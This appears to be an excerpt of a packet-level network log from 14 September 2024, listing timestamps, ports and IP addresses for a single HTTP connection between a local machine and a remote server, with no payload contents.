Sep 14, 2024 18:31:10.649269104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.649279118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.649341106 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.659471989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.659580946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.659590960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.659632921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.659636974 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.659645081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.659657001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.659667969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.659825087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.685735941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.685758114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.685769081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.685786009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.685797930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.685807943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.685818911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.685830116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.686364889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.730988026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731035948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731045008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731050968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731056929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731087923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731098890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731117010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731183052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731193066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731204033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731215000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731225014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731280088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731291056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.731355906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.731355906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.731355906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.732043028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.732083082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.732096910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.732110023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.732120991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.732207060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.732218981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.732228994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.732403994 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.732404947 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.733100891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733148098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733156919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733185053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733196020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733206987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733258963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733269930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733314991 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.733349085 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.733597994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733644009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733653069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733663082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733669996 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.733701944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733712912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733762026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733771086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.733772039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.733803034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.734419107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734428883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734447002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734515905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734527111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734536886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734544992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.734577894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734577894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.734591961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734611988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734622002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734631062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.734673977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.734711885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734723091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734733105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734744072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734754086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734771013 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.734805107 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.734810114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734821081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734829903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734864950 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.734877110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734889030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734899044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734911919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734921932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.734931946 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.734963894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.734965086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735033989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735044956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735054970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735088110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735105991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735112906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735117912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735131025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735142946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735152960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735169888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735203028 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735261917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735274076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735284090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735295057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735306025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735316992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735316992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735348940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735404968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735418081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735462904 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735475063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735486984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735496998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735508919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735527039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735529900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735538006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735549927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735554934 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735560894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735574961 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735596895 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735656977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735667944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735678911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735690117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735701084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735711098 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735744953 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735781908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735793114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735801935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735812902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735822916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735838890 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735872030 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735896111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735907078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735917091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735925913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.735950947 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.735982895 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.736099005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.736110926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.736120939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.736154079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.736180067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.736183882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.736196995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.736207962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.736218929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.736238956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.736269951 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.746596098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.746609926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.746614933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.746620893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.746625900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.746629953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.746634960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.746639967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.746913910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.772701025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.772712946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.772731066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.772739887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.772748947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.772763968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.772773027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.772783041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.773087025 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.818043947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818057060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818068027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818098068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818108082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818119049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818129063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818149090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818160057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818167925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818213940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818224907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818233967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818393946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818404913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.818708897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.818928957 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.819029093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.819039106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.819050074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.819111109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.819128036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.819152117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.819170952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.819181919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.819282055 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.820374012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820385933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820398092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820444107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820456028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820467949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820481062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820491076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820532084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820626020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820636034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820647001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820660114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820679903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820691109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820702076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.820795059 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.820899010 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.821276903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821319103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821331024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821348906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821360111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821475029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821485996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821496010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821556091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821568012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821578026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821598053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.821620941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821640968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821655035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821666002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821676970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821676970 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.821748972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821749926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.821759939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821770906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821783066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821800947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821813107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821825027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821837902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821847916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821851015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.821902990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.821917057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821929932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821940899 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.821954012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822024107 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.822068930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822082043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822092056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822102070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822120905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822133064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822144032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822154045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.822158098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822170019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822200060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822211981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822212934 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.822277069 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.822293997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822305918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822316885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822365999 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.822638988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822652102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822663069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822742939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822746992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.822761059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822773933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822787046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822846889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.822886944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822899103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822911024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822921991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822932959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822945118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822956085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822964907 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.822968006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.822981119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.823024035 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.823179007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.823338985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.823349953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.823360920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.823371887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.823390961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.823401928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.823415995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.823426962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.823437929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.823448896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.823535919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.823610067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.833384991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.833406925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.833420038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.833493948 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.833610058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.833621979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.833632946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.833643913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.833657026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.833699942 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.833796978 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.833875895 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.859810114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.859863997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.859875917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.859925985 CEST	80	49738	172.67.203.195	192.168.2.4
